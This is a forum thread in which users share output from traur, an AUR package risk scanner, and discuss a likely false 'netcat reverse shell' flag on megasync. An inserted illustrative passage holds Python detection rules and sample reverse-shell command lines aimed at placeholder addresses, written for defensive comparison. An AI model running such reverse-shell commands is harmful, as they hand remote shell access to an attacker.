New Rust Tool Traur Analyzes Arch AUR Packages for Hidden Risks

A new interesting tool has been released.

“New Rust Tool Traur Analyzes Arch AUR Packages for Hidden Risks”

“you can install it directly from the AUR. For more information, see the tool’s GitHub page.”

Now we just need a tool to check this one…:thinking:

7 Likes
   ~  traur scan                                                ✔  took 1m 35s   at 03:06:14 PM 
Scanning 49 installed AUR packages...
Fetching package metadata...
Got metadata for 49/49 packages
Fetching maintainer data for 38 unique maintainers...

=== traur scan results ===
Scanned: 49 packages (0 errors)
TRUSTED: 35  OK: 11  SKETCHY: 3  SUSPICIOUS: 0  MALICIOUS: 0

=== 3 flagged packages (SKETCHY+) ===

traur: radarr-develop (trust: 53/100)
Trust: SKETCHY
Negative signals:
! P-SYSTEMD-CREATE: Creating/enabling systemd service
M-VOTES-LOW: Package has very few votes (1)
T-AUTHOR-CHANGE: Git history shows multiple different authors
! SA-VAR-CONCAT-CMD: variable concatenation resolves to 'sh' (line 117)

traur: sonarr-develop (trust: 53/100)
Trust: SKETCHY
Negative signals:
! P-SYSTEMD-CREATE: Creating/enabling systemd service
M-VOTES-LOW: Package has very few votes (2)
T-AUTHOR-CHANGE: Git history shows multiple different authors
! SA-VAR-CONCAT-CMD: variable concatenation resolves to 'sh' (line 119)

traur: angrysearch (trust: 54/100)
Trust: SKETCHY
Negative signals:
! P-PYTHON-INLINE: Python inline code execution
! P-CHECKSUM-MISMATCH: source count (3) != sha256sums count (1)
B-MAINTAINER-SINGLE: Maintainer has only 1 package
T-AUTHOR-CHANGE: Git history shows multiple different authors
2 Likes
❯ traur scan
Scanning 21 installed AUR packages...
  Fetching package metadata...
  Got metadata for 21/21 packages
  Fetching maintainer data for 17 unique maintainers...

=== traur scan results ===
  Scanned: 21 packages (0 errors)
  TRUSTED: 13  OK: 7  SKETCHY: 1  SUSPICIOUS: 0  MALICIOUS: 0

=== 1 flagged packages (SKETCHY+) ===

traur: python-steam (trust: 58/100)
  Trust: SKETCHY
  Negative signals:
     ! B-TYPOSQUAT: Name 'python-steam' embeds popular package 'steam'
       T-AUTHOR-CHANGE: Git history shows multiple different authors
     ! SA-VAR-CONCAT-CMD: variable concatenation resolves to 'python' (line 24)
2 Likes
 traur scan
Scanning 18 installed AUR packages...
  Fetching package metadata...
  Got metadata for 18/18 packages
  Fetching maintainer data for 17 unique maintainers...

=== traur scan results ===
  Scanned: 18 packages (0 errors)
  TRUSTED: 12  OK: 4  SKETCHY: 2  SUSPICIOUS: 0  MALICIOUS: 0

=== 2 flagged packages (SKETCHY+) ===

traur: freetube-bin (trust: 51/100)
  Trust: SKETCHY
  Negative signals:
     ! P-NO-CHECKSUMS: No checksum array found in PKGBUILD
     ! P-CHECKSUM-MISMATCH: source_x86_64 count (3) != sha256sums_x86_64 count (1)
     ! P-CHECKSUM-MISMATCH: source_aarch64 count (3) != sha256sums_aarch64 count (1)
       T-AUTHOR-CHANGE: Git history shows multiple different authors

traur: peazip (trust: 57/100)
  Trust: SKETCHY
  Negative signals:
     ! P-CHECKSUM-MISMATCH: source count (3) != sha256sums count (1)
     ! SA-VAR-CONCAT-CMD: variable concatenation resolves to 'sh' (line 123)
3 Likes
╰─❯  traur scan         
Scanning 45 installed AUR packages...
  Fetching package metadata...
  Got metadata for 45/45 packages
  Fetching maintainer data for 39 unique maintainers...

=== traur scan results ===
  Scanned: 45 packages (0 errors)
  TRUSTED: 35  OK: 8  SKETCHY: 2  SUSPICIOUS: 0  MALICIOUS: 0

=== 2 flagged packages (SKETCHY+) ===

traur: shutthefetchup-git (trust: 49/100)
  Trust: SKETCHY
  Negative signals:
    !! P-BASE64: Base64 decoding (possible payload hiding)
       P-WEAK-CHECKSUMS: Using weak checksums (md5/sha1) without stronger alternative
       M-VOTES-LOW: Package has very few votes (2)
       T-SINGLE-COMMIT: Git history has only 1 commit
     ! SA-VAR-CONCAT-CMD: variable concatenation resolves to 'sh' (line 8)
     ! SA-HIGH-ENTROPY-HEREDOC: heredoc with high entropy (5.3 bits/byte, 673 bytes)

traur: shell-color-scripts-git (trust: 51/100)
  Trust: SKETCHY
  Negative signals:
     ! P-CHECKSUM-MISMATCH: source count (3) != sha256sums count (1)
       M-VOTES-LOW: Package has very few votes (1)
       T-SINGLE-COMMIT: Git history has only 1 commit
     ! SA-VAR-CONCAT-CMD: variable concatenation resolves to 'sh' (line 4)


2 Likes

Interesting to see everyone’s results running this tool, I’m gonna have to try it out myself when I get some time.

BTW there are some limitations atm with this tool see here:

But since it’s a new tool they’re probably gonna fix/add this soon.

Although I think this has a few flaws, it certainly can help AUR maintainers to update their packages/build scripts, to prevent issues in the future.

Like SHA checksums missing or mismatching sources.

A lot of “sketchy” warnings are not directly linked to a problem, like low votes. But a lot of maintainer changes can be a warning sign.

[richardc@richard-ms7c91 ~]$ traur
Trust scoring for AUR packages

Usage: traur

Commands:
scan Scan a package (or all installed AUR packages if none specified)
allow Whitelist a package (skip future scans)
bench Benchmark scanning the N most recently modified AUR packages
help Print this message or the help of the given subcommand(s)

Options:
-h, --help  Print help
[richardc@richard-ms7c91 ~]$ traur scan
Scanning 38 installed AUR packages...
Fetching package metadata...
Got metadata for 38/38 packages
Fetching maintainer data for 32 unique maintainers...

=== traur scan results ===
Scanned: 38 packages (0 errors)
TRUSTED: 28 OK: 8 SKETCHY: 2 SUSPICIOUS: 0 MALICIOUS: 0

=== 2 flagged packages (SKETCHY+) ===

traur: python-ewmh (trust: 53/100)
Trust: SKETCHY
Negative signals:
! P-CHECKSUM-MISMATCH: source count (3) != sha256sums count (1)
T-AUTHOR-CHANGE: Git history shows multiple different authors
! SA-VAR-CONCAT-CMD: variable concatenation resolves to 'python' (line 7)

traur: octopi (trust: 60/100)
Trust: SKETCHY
Negative signals:
! P-EVAL-VAR: Dynamic code execution via eval
! P-NO-CHECKSUMS: No checksum array found in PKGBUILD
T-AUTHOR-CHANGE: Git history shows multiple different authors
[richardc@richard-ms7c91 ~]$

This is what my system shows . . .

Rich :wink:

Apparently, Megasync is “malicious”? :thinking:

╰─❯ traur scan
Scanning 19 installed AUR packages...
  Fetching package metadata...
  Got metadata for 19/19 packages
  Fetching maintainer data for 17 unique maintainers...

=== traur scan results ===
  Scanned: 19 packages (0 errors)
  TRUSTED: 13  OK: 2  SKETCHY: 3  SUSPICIOUS: 0  MALICIOUS: 1

=== 4 flagged packages (SKETCHY+) ===

traur: megasync (trust: 5/100)
  Trust: MALICIOUS
  !! Override gate fired: P-REVSHELL-NC
  Negative signals:
    !! P-REVSHELL-NC: Netcat reverse shell
     ! P-CHECKSUM-MISMATCH: source count (7) != sha256sums count (5)

traur: freetube-bin (trust: 51/100)
  Trust: SKETCHY
  Negative signals:
     ! P-NO-CHECKSUMS: No checksum array found in PKGBUILD
     ! P-CHECKSUM-MISMATCH: source_x86_64 count (3) != sha256sums_x86_64 count (1)
     ! P-CHECKSUM-MISMATCH: source_aarch64 count (3) != sha256sums_aarch64 count (1)
       T-AUTHOR-CHANGE: Git history shows multiple different authors

traur: python-steam (trust: 58/100)
  Trust: SKETCHY
  Negative signals:
     ! B-TYPOSQUAT: Name 'python-steam' embeds popular package 'steam'
       T-AUTHOR-CHANGE: Git history shows multiple different authors
     ! SA-VAR-CONCAT-CMD: variable concatenation resolves to 'python' (line 24)

traur: proton-ge-custom-bin (trust: 58/100)
  Trust: SKETCHY
  Negative signals:
     ! B-TYPOSQUAT: Name 'proton-ge-custom-bin' embeds popular package 'proton-ge-custom'
       T-AUTHOR-CHANGE: Git history shows multiple different authors
     ! SA-VAR-CONCAT-CMD: variable concatenation resolves to 'sh' (line 68)
╰─❯
1 Like

This means, afaik, that this AUR package uses 7 different sources (URLs) but only 5 of them use sha256sums (2 don’t and might be malicious?)

While this can be a warning sign, it does not mean it is malicious, only that those sources used don’t have any checksum.

2 Likes

Same goes for this example

So yes there are multiple people who contribute to this, and yes it could be possible that one of them can/has added malicious code. But it doesn’t prove anything, only that the possibility can exist.

1 Like

I don’t know what this means though

@fred666, thanks for the clarification. While generally a useful tool, it seems that Traur can needlessly worry someone about installed AUR packages.

According to Google’s AI overview:

“A Netcat reverse shell (often referred to as p-revshell-nc in specialized tools) is a technique used in cybersecurity to gain remote access to a target machine. In a reverse shell, the target machine initiates an outbound connection back to the attacker’s machine, which is listening for the connection. This method is highly effective for bypassing firewall restrictions that typically block incoming connections but allow outgoing traffic.”

I think this should be used to get an idea about an AUR package, but the outcome should not be blindly interpreted.

And yes it can get the user worried, while that does not directly mean it should

1 Like

Right so this can be a serious warning, it all depends on how the AUR program or build script is using this. I have no further knowledge of this

1 Like

I think this is why it is being flagged as malicious. However, unless I am missing something, this looks like a potential false positive.

It may be finding nc because it is in Megasync.

2 Likes

Certainly possible

I think it is flagging this line:

    git -C MEGAsync -c protocol.file.allow='always' submodule update

Because it contains nc -c.

You might want to report that to the traur maintainer.

3 Likes
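The false positive guessed at above is worth seeing in code. This is an added example, not the thread’s code and not a statement of how traur actually matches (that it uses a plain substring search is the thread’s guess and an assumption here): a naive substring check for `nc -c` / `nc -e` fires on `git -C MEGAsync -c ...` because `MEGAsync -c` ends in `nc -c`, while a tokenised check that only fires when a netcat binary is in command position with an exec flag does not. The sample command lines, including the TEST-NET addresses, are constructed for the illustration.

```python
"""Substring vs. tokenised netcat-reverse-shell heuristic (added illustration).

Not traur's code. Shows why matching the bytes "nc -c" anywhere in a line flags
the MEGAsync git command, and one way to avoid it.
"""
import shlex
from typing import List

# Crude byte patterns in the style the thread suspects traur of using.
NAIVE_PATTERNS = ("nc -c", "nc -e", "ncat -e", "ncat --exec")

# Tokenised rule: netcat binary as the command word, plus an exec-style flag.
NETCAT_BINARIES = {"nc", "ncat", "netcat"}
EXEC_FLAGS = {"-c", "-e", "--exec", "--sh-exec"}
SEPARATORS = {"|", "||", "&&", ";", "&"}


def naive_revshell(line: str) -> bool:
    """Fire if any crude pattern occurs anywhere in the line."""
    return any(p in line for p in NAIVE_PATTERNS)


def simple_commands(tokens: List[str]) -> List[List[str]]:
    """Split a token list into simple commands on whitespace-separated shell operators."""
    cmds, cur = [], []
    for tok in tokens:
        if tok in SEPARATORS:
            cmds.append(cur)
            cur = []
        else:
            cur.append(tok)
    cmds.append(cur)
    return [c for c in cmds if c]


def tokenized_revshell(line: str) -> bool:
    """Fire only when a netcat binary is the command word and carries an exec flag."""
    try:
        tokens = shlex.split(line, comments=True)
    except ValueError:
        # Unbalanced quotes: cannot tokenise, fall back to the crude check.
        return naive_revshell(line)
    for cmd in simple_commands(tokens):
        head = cmd[0].rsplit("/", 1)[-1]  # strip a leading path such as /usr/bin/
        if head in NETCAT_BINARIES and any(t in EXEC_FLAGS for t in cmd[1:]):
            return True
    return False


# Constructed sample lines for the comparison.
MEGASYNC_LINE = "git -C MEGAsync -c protocol.file.allow='always' submodule update"
REVSHELL_LINE = "nc -e /bin/sh 198.51.100.7 4444"
REVSHELL_PATH_LINE = "/usr/bin/ncat --exec /bin/bash 198.51.100.7 4444 || true"
HARMLESS_LINE = "echo 'sync -c done'"

if __name__ == "__main__":
    for line in (MEGASYNC_LINE, REVSHELL_LINE, REVSHELL_PATH_LINE, HARMLESS_LINE):
        print(f"naive={naive_revshell(line)!s:5} tokenised={tokenized_revshell(line)!s:5}  {line}")
```

The tokenised rule is not a complete detector (a mkfifo-and-pipe reverse shell uses netcat without any exec flag and would need a different rule), but it is enough to show that the MEGAsync line is a parsing artefact of the pattern, not a reverse shell, which is the point worth including in a report to the traur maintainer.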

My scan results are “sketchy”

traur: python-npx (trust: 47/100)
Trust: SKETCHY
Negative signals:
! P-PYTHON-INLINE: Python inline code execution
M-VOTES-LOW: Package has very few votes (2)
M-POP-ZERO: Popularity is 0 (no recent usage)
T-AUTHOR-CHANGE: Git history shows multiple different authors
! G-DOWNLOAD-NODE: Node.js HTTP download or npx remote execution

traur: ventoy (trust: 55/100)
Trust: SKETCHY
Negative signals:
P-HTTP-SOURCE: Plain HTTP source URL (no TLS, MITM risk)
! P-CHECKSUM-MISMATCH: source count (71) != sha256sums count (57)
!! G-BUSYBOX-SHELL: Busybox shell/network subcommand abuse

traur: epsonscan2-non-free-plugin (trust: 59/100)
Trust: SKETCHY
Negative signals:
!! P-BASE64: Base64 decoding (possible payload hiding)
! P-NO-CHECKSUMS: No checksum array found in PKGBUILD
P-BASE64: Base64 decoding (possible payload hiding)
This is probably because the source is closed, so no way of knowing what happens inside